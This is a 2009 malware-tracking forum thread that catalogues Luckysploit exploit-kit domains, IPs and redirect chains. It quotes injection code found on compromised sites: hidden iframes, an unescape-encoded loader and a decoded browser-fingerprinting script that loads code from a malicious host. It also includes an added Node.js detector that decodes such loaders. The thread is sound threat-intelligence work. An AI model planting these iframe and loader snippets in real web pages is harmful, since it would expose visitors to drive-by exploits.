Malware Domain List

Malware Related => Malicious Domains => Topic started by: phenom on February 12, 2009, 12:39:02 pm

Title: another Luckysploit IP
Post by: phenom on February 12, 2009, 12:39:02 pm
Code: [Select]
http://hello-to-you.net/rttz/?t=6
Its IP is 78.109.30.48, already in the MDL database, but the entry does not yet list Luckysploit or the domain name.

Looks pretty similar to the fuck-lady version.

Wepawet link:
http://wepawet.iseclab.org/view.php?hash=c616a15254aa57bb0035ecce05633557&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 12, 2009, 01:46:53 pm
I have seen many Luckysploit URLs in the last few days, but they work only once from the same IP.

Example:
Code: [Select]
http://85.17.189.183/opis2/?h=
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 12, 2009, 03:36:59 pm
Another one
Code: [Select]
http://202.73.57.6/tomi
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 14, 2009, 05:18:55 am
Code: [Select]
http://r-state.com/equi/
http://wepawet.cs.ucsb.edu/view.php?hash=14a57e49e92bebd6116da5ebddef1418&t=1234542448&type=js
Title: Re: another Luckysploit IP
Post by: GmG on February 15, 2009, 07:13:55 pm
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 15, 2009, 09:47:42 pm
Thanks, GmG. Nice collection.
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 18, 2009, 02:49:11 pm
Another URL. Thanks to our new member Bang.

Code: [Select]
http://deinglaube.com/images/
redirects to the Luckysploit URL
Code: [Select]
http://statclick.net/main/?t=1
Title: Re: another Luckysploit IP
Post by: Micha on February 18, 2009, 03:28:30 pm
The other domains are also not very kosher:

http://www.trustedsource.org/query/ns1.globo-meds.com?m=ns

Code: [Select]
Domains on Nameserver ns1.globo-meds.com

statclick.net
sei-keine.com
globo-meds.com
google-analitic.com
deinglaube.com
verzeih.com
auf-jeder.com
chiburashko.com
xryndel.com

Already listed as bad since last year: http://www.malwaredomainlist.com/mdl.php?search=verzeih.com
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 18, 2009, 06:50:34 pm
Code: [Select]
http://verzeih.com/state/?t=1
redirects to another Luckysploit

Code: [Select]
top.sei-keine.com/u-store/?t=1
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 24, 2009, 06:10:13 pm
Code: [Select]
federalreserve.banknetworks.net/bb/?t=2
http://wepawet.cs.ucsb.edu/view.php?hash=5f7cc23f4777d2d36527479fc1154557&t=1235499824&type=js
Title: Re: another Luckysploit IP
Post by: Micha on February 27, 2009, 09:11:31 am
Another example: (watch the hidden IFRAME to DummySploit)

Code: [Select]
hxxp://ustreasury.usbanknet.net
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 28, 2009, 02:24:47 pm
Code: [Select]
85.17.189.183/clicksagent2
http://wepawet.cs.ucsb.edu/view.php?hash=e7f5ef845f85b27352b3d890ea6bab9a&t=1235832015&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 01, 2009, 02:21:28 pm
Code: [Select]
analytics.pl.ua/scripts/?t=4
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 02, 2009, 02:10:49 pm
Code: [Select]
odile-marco.com/tomi
http://wepawet.cs.ucsb.edu/view.php?hash=104400c94a446e2cdb803341c189dc03&t=1236003897&type=js
Title: Re: another Luckysploit IP
Post by: GmG on March 06, 2009, 07:35:39 pm
Code: [Select]
http://idealadvertising.org/clicksagent2/?t=2
Title: Re: another Luckysploit IP
Post by: DiFor on March 07, 2009, 01:39:16 am
This Lucky is an example of http://www.malwaredomainlist.com/forums/index.php?topic=2577.msg7948#msg7948
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 07, 2009, 07:55:14 pm
Code: [Select]
bigmyfuck.com/prn/index.php?t=4
Code: [Select]
hello-to-you.net/love/?t=2
Title: Re: another Luckysploit IP
Post by: GmG on March 08, 2009, 07:17:25 pm
Code: [Select]
http://193.138.172.15/salo/?t=3
http://193.138.172.15/mark/
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 10, 2009, 12:37:48 pm
Code: [Select]
clickcouner.cn
v-security.info/alla
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 12, 2009, 11:17:51 am
Code: [Select]
stats-analytics.cn/lera/
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 12, 2009, 07:06:56 pm
Code: [Select]
splo2day.com/lera/?t=6
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 13, 2009, 11:29:31 pm
Code: [Select]
84.244.138.55/ase/?t=4
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 15, 2009, 07:00:16 pm
Code: [Select]
bestlotron.cn/in.cgi?cocacola
kotleto.com/main/?t=1
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 16, 2009, 03:02:47 pm
Code: [Select]
78.41.207.196/vertu/?t=5
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 17, 2009, 04:37:35 pm
Code: [Select]
78.41.207.196/vertu/?t=5

Today I found the way of infection.

Compromised sites like
Code: [Select]
www.my-harmony.org
contain IFrames
Code: [Select]
body><iframe src="hxxp://perfectnamestore.cn/in.cgi?income4" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="hxxp://namebuyline.cn/in.cgi?income2" width=1 height=1 style="visibility: hidden"></iframe><

to
Code: [Select]
hxxp://perfectnamestore.cn/in.cgi?income4
hxxp://namebuyline.cn/in.cgi?income2

which redirect to the Luckysploit URL.
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 18, 2009, 03:57:34 pm
Code: [Select]
r-security.info/alla
Title: Re: another Luckysploit IP
Post by: GmG on March 18, 2009, 05:00:21 pm
Code: [Select]
r-security.info/alla

and

Code: [Select]
http://l-security.info/alla
http://p-security.info/alla

 ;)
Title: Re: another Luckysploit IP
Post by: GmG on March 18, 2009, 07:21:55 pm
Code: [Select]
http://72.233.79.18/tyrek/?t=2
http://wepawet.iseclab.org/view.php?hash=08708c81fd98614d7ffa6d03578c2842&t=1237404046&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 24, 2009, 07:23:49 am
Code: [Select]
58.65.237.2/?t=1
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 24, 2009, 06:03:14 pm
Code: [Select]
niencos3432d.cn/bb/?t=7
http://wepawet.cs.ucsb.edu/view.php?hash=57ad9efedc55e1516ad177868892e886&t=1237918022&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 25, 2009, 08:19:45 pm
Code: [Select]
news-week.biz/samuraj/
services.rv.ua/scripts/
cheesee.uz.ua/scripts/
updsearch.if.ua/scripts/
core.uz.ua/scripts/
asd8.uz.ua/scripts/
host4you.rv.ua/scripts/
adodb.vn.ua/scripts/
jogo.if.ua/scripts/
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 26, 2009, 11:25:00 am
Code: [Select]
google-stat.com/tomi/?t=2
Title: Re: another Luckysploit IP
Post by: GmG on March 26, 2009, 05:51:26 pm
Code: [Select]
http://alibaster-lab.com/ku4ka/?t=1
Title: Re: another Luckysploit IP
Post by: GmG on March 28, 2009, 03:34:48 pm
Code: [Select]
http://kingf0x.net/clicksagent2/?t=2
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 28, 2009, 05:41:12 pm
Code: [Select]
myfucking-pussy.com/tyrek/
Title: Re: another Luckysploit IP
Post by: GmG on April 04, 2009, 05:52:51 pm
Code: [Select]
http://0direct.com/imga/?t=2
http://that0world.com/imga/?t=4
http://goneseanatural.com/imga/?t=4
http://meetyourlove.ws/imga/?t=4
Title: Re: another Luckysploit IP
Post by: SysAdMini on April 06, 2009, 05:30:53 pm
Code: [Select]
buidnote.com/nates/?h
See also:

http://www.malwaredomainlist.com/forums/index.php?topic=2640.msg8607#msg8607
Title: Re: another Luckysploit IP
Post by: carmen on April 10, 2009, 03:29:57 pm
I found more information on luckysploit :D

http://mipistus.blogspot.com/2009/02/luckysploit-la-mano-derecha-de-zeus.html
http://evilfingers.blogspot.com/2009/02/luckysploit-right-hand-of-zeus.html

Good post. Bye
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on April 13, 2009, 07:46:40 am
67.18.222.2

Code: [Select]
hxxp://whitecitylights.com
which leads to a new domain on 85.17.189.183

Code: [Select]
hxxp://firstplumb.info/clicksagent/?t=1
Redirection Analysis: Wepawet (http://wepawet.iseclab.org/view.php?hash=1824b9bf14bce00a89f9bb0efc1ccbda&t=1239583980&type=js)
Title: Re: another Luckysploit IP
Post by: michajp on April 14, 2009, 04:07:34 am
Here is another one, which was found in the upper folder of a phishing site:

Code: [Select]
hxxp://fzfaw6.davtraff.com/tomi/?t=2
micha
Title: Re: another Luckysploit IP
Post by: michajp on April 14, 2009, 09:25:28 am
Hello,

Code: [Select]
hxxp://odmarco.com/tomi/?t=2
micha
Title: Re: another Luckysploit IP
Post by: michajp on April 14, 2009, 09:34:02 am
Ugh, please ignore the former one, it's already in the list.

Cheers
Title: Re: another Luckysploit IP
Post by: SysAdMini on April 14, 2009, 09:36:49 am
Quote
Ugh, please ignore the former one, it's already in the list.

Cheers

No, it wasn't in the list. Just added.  :)
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on April 15, 2009, 02:36:35 pm
New IP: 88.241.202.224 - Redirect to LuckySploit

Code: [Select]
hxxp://jafarcompany.biz

related to 85.17.189.183 (already in the list)

Code: [Select]
hxxp://firstplumb.info/clicksagent/?t=9
hxxp://85.17.189.183/clicksagent/?h=17h

Wepawet Analysis (http://wepawet.cs.ucsb.edu/view.php?hash=36a7465d63cd70ad7b3bdeb4bf1cf928&t=1239806083&type=js)
Title: Re: another Luckysploit IP
Post by: SysAdMini on April 25, 2009, 09:41:34 am
Code: [Select]
fiolao.cn/lyre/?
http://wepawet.cs.ucsb.edu/view.php?hash=02e8922e6049bc285474a38ed3b81f9d&t=1240652702&type=js
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on April 27, 2009, 09:53:43 pm
Code: [Select]
hxxp://firstplumb.info/clicksagent2/?t=1&

wepawet fails to analyze this one (URL 404 not found)

Use jsunpack (http://jsunpack.jeek.org/dec/go)
Title: Re: another Luckysploit IP
Post by: mercutio on April 28, 2009, 07:26:51 am
Reanalyzed from a different IP (for a change, we also get a binary):
http://wepawet.cs.ucsb.edu/view.php?hash=030fdf6bcc7d2b81759f0f3f041ff929&t=1240903600&type=js

Title: Re: another Luckysploit IP
Post by: michajp on April 28, 2009, 05:23:14 pm
Hello,

Code: [Select]
hxxp://usbanks.server-17.us/bb/?t=2

Micha
Title: Re: another Luckysploit IP
Post by: michajp on April 28, 2009, 05:55:07 pm
Code: [Select]
hxxp://federalreservebanks.safe-connect.us/bb/?t=2
Title: Re: another Luckysploit IP
Post by: CM_MWR on April 28, 2009, 06:25:02 pm
Title: Re: another Luckysploit IP
Post by: michajp on April 29, 2009, 06:07:19 am
Code: [Select]
hxxp://usbanks.ebanks-net.us/34733/CM/wire/issue-127932/bb/?t=2
hxxp://usabanks.secureserver-32.us/31107/CM/wire/issue-127431/bb/?t=2
hxxp://federalreservebanks.central-security.us/32394/CM/wire/issue-127835/bb/?t=2
hxxp://federalreserve.secureserver-37.us/37594/CM/wire/issue-127231/bb/?t=2
hxxp://usbanks.1-secure.us/34846/CM/wire/issue-127333/bb/?t=2
Title: Re: another Luckysploit IP
Post by: michajp on April 29, 2009, 12:11:50 pm
Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2
Title: Re: another Luckysploit IP
Post by: Mr Clean on April 29, 2009, 12:43:05 pm
Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2

anyone care to go fishing?

http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.42#result

Title: Re: another Luckysploit IP
Post by: RS-232 on April 29, 2009, 12:57:14 pm
Just a quick note... exactly two IPs earlier -> proxim.ircgalaxy.pl  ;)
http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.40#result
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on May 03, 2009, 04:31:54 pm
redirects to luckysploit on 85.17.189.183
Code: [Select]
hxxp://antivirus.vc
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=7182041b19860941fe33e334ea7031f8&t=1238594164)

with this

Quote
if (!myia){
  document.write(unescape(
    '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61' +
    '%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68' +
    '%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%31%39%32%30%29%2b%27%38%39%61%61%35%34%66%66%35%27%20' +
    '%77%69%64%74%68%3d%37%33%30%20%68%65%69%67%68%74%3d%33%30%34%20%73%74%79%6c%65%3d%27%76%69' +
    '%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true;

Quote
<iframe name=c26 src='hxxp://antivirus.vc/?'+Math.round(Math.random()*221920)+'89aa54ff5' width=730 height=304 style='visibility:hidden'></iframe>
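As an added example (not code from the thread or from MDL), the Node.js script below does the analyst's side of two posts in this thread offline: it pulls the `document.write(unescape('...'))` literal apart, decodes it, and flags hidden iframes the way members here do by eye, covering both the raw 1x1 iframes quoted in the March 17 my-harmony.org post and the encoded antivirus.vc frame in this one. All function names are mine, and both sample inputs are constructed from the snippets quoted in those posts.

```javascript
// Added example (not code from the MDL thread): offline triage of fetched page source
// for the two injection patterns posted here: raw 1x1 / visibility:hidden <iframe> tags
// and the same kind of iframe wrapped in document.write(unescape('%3c%69...')).
// Pure string analysis, nothing is evaluated or fetched.

// Constructed sample 1: a compromised page carrying the two 1x1 hidden iframes quoted
// in the March 17 post (hxxp:// defanged as in the thread).
const SAMPLE_COMPROMISED_PAGE = `<html><body><p>Welcome</p>
<iframe src="hxxp://perfectnamestore.cn/in.cgi?income4" width=1 height=1 style="visibility: hidden"></iframe><iframe src="hxxp://namebuyline.cn/in.cgi?income2" width=1 height=1 style="visibility: hidden"></iframe>
</body></html>`;

// Constructed sample 2: the loader quoted in the May 03 post, with the percent-encoded
// string wrapped across lines the way forum pastes usually are.
const SAMPLE_UNESCAPE_LOADER = `<script>
if (!myia){
  document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61
%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68
%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%31%39%32%30%29%2b%27%38%39%61%61%35%34%66%66%35%27%20
%77%69%64%74%68%3d%37%33%30%20%68%65%69%67%68%74%3d%33%30%34%20%73%74%79%6c%65%3d%27%76%69
%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true;
</script>`;

// Decode the literal inside every document.write(unescape('...')) call. Whitespace from
// line wrapping is dropped first; %uXXXX and %XX escapes are decoded by hand so that
// malformed input cannot throw the way decodeURIComponent() would.
function decodeUnescapePayloads(source) {
  const callRe = /document\.write\s*\(\s*unescape\s*\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/g;
  const payloads = [];
  let m;
  while ((m = callRe.exec(source)) !== null) {
    const compact = m[2].replace(/\s+/g, "");
    payloads.push(compact
      .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
  }
  return payloads;
}

// Attribute map for every <iframe ...> opening tag in a chunk of HTML. Quoted and
// unquoted attribute values are both accepted; attribute names are lower-cased.
function iframeAttributes(html) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  return tags.map((tag) => {
    const attrs = {};
    const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    let a;
    while ((a = attrRe.exec(tag)) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    return attrs;
  });
}

// Heuristic used throughout the thread: the frame is either styled invisible or sized
// down to at most 1x1 pixel, so the victim never sees the exploit page load.
function isHiddenIframe(attrs) {
  const style = (attrs.style || "").replace(/\s+/g, "").toLowerCase();
  const tiny = (v) => v !== undefined && parseInt(v, 10) <= 1;
  return style.includes("visibility:hidden") || style.includes("display:none") ||
    (tiny(attrs.width) && tiny(attrs.height));
}

// Host part of a src value. Only the leading literal is used, because a src such as
// 'http://host/?'+Math.round(Math.random()*221920)+'89aa54ff5' is a JS expression.
function srcHost(src) {
  const m = /^(?:hxxps?|https?):\/\/([^/'"?\s]+)/i.exec(src || "");
  return m ? m[1].toLowerCase() : null;
}

// Scan the raw HTML and every decoded unescape() payload; report each hidden iframe as
// { host, src, decoded }, where decoded marks frames that only exist after decoding.
function findHiddenIframes(source) {
  const chunks = [{ html: source, decoded: false }]
    .concat(decodeUnescapePayloads(source).map((html) => ({ html, decoded: true })));
  const findings = [];
  for (const { html, decoded } of chunks) {
    for (const attrs of iframeAttributes(html)) {
      if (isHiddenIframe(attrs)) {
        findings.push({ host: srcHost(attrs.src), src: attrs.src, decoded });
      }
    }
  }
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const sample of [SAMPLE_COMPROMISED_PAGE, SAMPLE_UNESCAPE_LOADER]) {
    console.log(findHiddenIframes(sample));
  }
}
```

The `decoded` flag separates frames an attacker hid behind encoding from ones injected in the clear, which is usually the first question when triaging a compromised site.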
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on May 05, 2009, 03:16:22 pm
209.44.100.58
Code: [Select]
hxxp://odegda.cv.ua/in.cgi?2&
hxxp://totalmic.if.ua/sx/?t=2

the exploit: Wepawet (http://wepawet.iseclab.org/view.php?hash=ad3cbb847c3ccbdeb7027147ec7d820f&type=js)
Title: Re: another Luckysploit IP
Post by: michajp on May 12, 2009, 03:18:55 pm
Code: [Select]
hxxp://ustreasury.federalbanksystem.net/31689/FRB/phishing/Issue~73841/
hxxp://ustreasury.federalbanks.us/33704/FRB/phishing/Issue~73624/
hxxp://usbanks.esecure-federal.us/38297/FRB/phishing/Issue~73818/
hxxp://federalreserve-online.com/31419/FRB/phishing/Issue~73574/
hxxp://federalreserve-online.com/37692/FRB/phishing/Issue~73680/
hxxp://federalreserve-online.us/34673/FRB/phishing/Issue~73208/
hxxp://ustreasury.federalbanks.us/36476/FRB/phishing/Issue~73412/
hxxp://ustreasury.federalbanksystem.us/35242/FRB/phishing/Issue~73040/
hxxp://federalreserve-direct.com/32347/FRB/phishing/Issue~73659/
Title: Re: another Luckysploit IP
Post by: MysteryFCM on May 12, 2009, 05:48:06 pm
Related to the federal crap;

http://hosts-file.net/pest.asp?show=221.5.74.
Title: Re: another Luckysploit IP
Post by: CkreM on May 15, 2009, 06:10:46 am
60.29.232.31
(there's 1 listed Luckysploit on that IP)

Code: [Select]
sgariiista.com/bb/?t=3
http://wepawet.iseclab.org/view.php?hash=ec4a50b766fdb421f468da5be992490b&t=1242367679&type=js

Code: [Select]
Bolelshiko.com/bb/?t=3
Iiikaolllxxx.net/bb/?t=3
Sdfiiixkoas.net/bb/?t=3
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on May 18, 2009, 09:21:34 pm
Several websites are pointing to the domain below with an IFRAME
Quote
<iframe src='hxxp://www.fujifork.co.jp/' width=1 height=1 style='visibility: hidden'></iframe>
<iframe src='hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b' width=1 height=1 style='visibility: hidden'></iframe>

compromised website used to spread LuckySploit:
Code: [Select]
hxxp://fujifork.co.jp
Wepawet (http://wepawet.iseclab.org/view.php?hash=e3deb27ca41f263d3d5611db29e98b9a&t=1242681390&type=js)

The IP hosting the LuckySploit:
Code: [Select]
hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b
Wepawet link (http://wepawet.iseclab.org/view.php?hash=21720cc210eb0a166509839930236859&t=1242681445&type=js) (404 not found)
Jsunpack (http://jsunpack.jeek.org/dec/go?url=82.103.131.211_maco__6e662d941e448da7c36e018acb86120b)
Title: Re: another Luckysploit IP
Post by: michajp on May 26, 2009, 02:36:55 am
Code: [Select]
hxxp://italycruiseegypt.com/s/in.cgi?3 
redir to:
hxxp://mainssrv.com/maco/?24ed4e573fdb875bf41973b1e40e2dc1

http://www.virustotal.com/analisis/667d08f74147c71f914b09fe4f6fe559078819e23eb0e8280e9580e07c89de99-1243305061
Title: Re: another Luckysploit IP
Post by: michajp on June 05, 2009, 08:48:24 am
Code: [Select]
hxxp://myfucking-pussy.com/tyrek/?t=4
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on June 11, 2009, 06:35:39 am

Code: [Select]
hxxp://originalsp.net/maoi/?bcba60e313aac523133482c9fe977c87
Wepawet (http://wepawet.iseclab.org/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1244400008&type=js)
Title: Re: another Luckysploit IP
Post by: michajp on June 11, 2009, 12:50:57 pm
Code: [Select]
hxxp://213.155.29.101/vsetakoe/?5bd6b116bfc711362f0779381b812ff4
Title: Re: another Luckysploit IP
Post by: michajp on June 13, 2009, 11:24:37 am
Code: [Select]
hxxp://194.165.4.25/.luc/?f3d3b53b0ce86d0e3c8a48b36f12d42c/
Title: Re: another Luckysploit IP
Post by: SysAdMini on July 24, 2009, 11:25:29 am
redirects to Luckysploit
Code: [Select]
calid.org/pro/in.cgi?2
Luckysploit
Code: [Select]
folemio.info/vsetakoe/?036e47146bcc7ea276d378224402fef7
Title: Re: another Luckysploit IP
Post by: michajp on August 09, 2009, 08:46:33 am
Redirects to Luckysploit:
Code: [Select]
hxxp://mywebdesignonline.co.uk/SUD/
#Note: As you know, the Luckysploit code is usually only pushed once per IP. The above URL contains more nastiness on reload after the first push of the Luckysploit.

Luckysploit:
Code: [Select]
hxxp://122.70.145.157/.cua/?64bbea3228fa200efa17528148f6dddf
Title: Re: another Luckysploit IP
Post by: MysteryFCM on August 09, 2009, 08:54:45 am
Interesting open dir at mywebdesignonline.co.uk too ;)

Title: Re: another Luckysploit IP
Post by: MysteryFCM on August 09, 2009, 09:02:20 am
Aww, it's our old friends, lol ....

/_vti_inf.html

JS in the above file decodes to:

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
  zrvzts="A";
  eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
  document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");
}
Could've sworn martuz.cn was already offline?

/edit

Just phoned EUKHost and was told to e-mail them as he can't deal with it till tomorrow (doesn't work Sundays apparently), so have fired an e-mail off.
Title: Re: another Luckysploit IP
Post by: MysteryFCM on August 10, 2009, 08:07:00 pm
EUKHost have been in touch to tell me the owner has taken this domain offline.
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on September 10, 2009, 08:37:39 am
Code: [Select]
94.75.216.181/dope/?d28e33f30013d909cd5db615562e2690
mylipc.com/hjjh/?7b0d33b2f1acb347aca386aa39ea3046
lingobest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
firesaverbest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
sebastienleabse.com/sou/?0ba3a2a491026e837182ada457aa4796
sebastienleabse.com/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)
83.133.113.14/sou/?0ba3a2a491026e837182ada457aa4796
83.133.113.14/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)

redirects to luckysploit:
85.10.221.162
Code: [Select]
mega-tracker.info/in.cgi?4
Wepawet (http://wepawet.iseclab.org/view.php?hash=f189dc8e57d9d60d55290b67cc91ed7a&t=1252569753&type=js)
Code: [Select]
wareshield.cn/jst.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=59c52491c4a6b704851f9715c42958da&t=1252571719&type=js)
Title: Re: another Luckysploit IP
Post by: Serg on September 10, 2009, 12:25:55 pm
Hi 2 all
I'm trying to analyse a compromised web site
Code: [Select]
http://www.comanda-parfum.com/
But I got some problems...
I got PDF sploits and malware, but I have a problem with the attached file. It was downloaded with the following headers:
Quote
Request-ID: 13

GET hxxp://212.174.200.114/.cuo/?Z2xd/S8ZgwjJgt+hbVMvAG0dhSABFtvNQO7IQrnip+o= HTTP/1.0
Host: 212.174.200.114
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: hxxp://212.174.200.114/.cuo/?934db28b45fa5186d3f0158e2f52ac83
Cookie: login=262bb56a675e3a0a21db4b558f7ce3a2
----
Answer-ID: 13

HTTP/1.0 200 OK
Date: Thu, 10 Sep 2009 06:39:51 GMT
Content-Type: text/html
X-Powered-By: PHP/5.1.6
Content-Encoding: gzip
Content-Length: 3988
X-Cache: MISS from chicken-machine
X-Cache-Lookup: MISS from chicken-machine:3128
Connection: keep-alive
Proxy-Connection: keep-alive

Under the gzip I suspect base64 encoding, but what is inside? Any ideas? Please?
Title: Re: another Luckysploit IP
Post by: michajp on September 12, 2009, 02:23:35 pm
Code: [Select]
hxxp://195.88.190.235/irri/?1bd3f86ca81712ec6a45340cbc884491
Title: Re: another Luckysploit IP
Post by: michajp on September 13, 2009, 01:39:57 am
Code: [Select]
hxxp://locationlite.com/medow/?c42fb9fe6092adcbeb2bd40c788a50a2
Title: Re: another Luckysploit IP
Post by: michajp on September 18, 2009, 01:03:54 am
This site contains an iFramer (but gets cleaned and reinfected several times, it seems):

Code: [Select]
hxxp://0koryu0.easter.ne.jp/
http://wepawet.iseclab.org/view.php?hash=87191810fafdd9fe9bc88fac973d712c&t=1253235673&type=js

... which leads to Luckysploit site:

Code: [Select]
hxxp://212.174.200.114/.cuo/?fef5293d546b749a15d4c5c487f39109
Title: Re: another Luckysploit IP
Post by: michajp on September 22, 2009, 08:50:02 am
Now

Code: [Select]
hxxp://step2me.net/.dif/go.php?sid=1&
leading to the same as the former post:

Code: [Select]
hxxp://212.174.200.114/.cuo/?fef5293d546b749a15d4c5c487f39109
Title: Re: another Luckysploit IP
Post by: michajp on September 22, 2009, 01:52:29 pm
Code: [Select]
hxxp://poohfamily.client.jp/
Containing iframe:

Code: [Select]
hxxp://pipetro.org/irri/?3230c8ac92458eb62ed568fa43ed2a08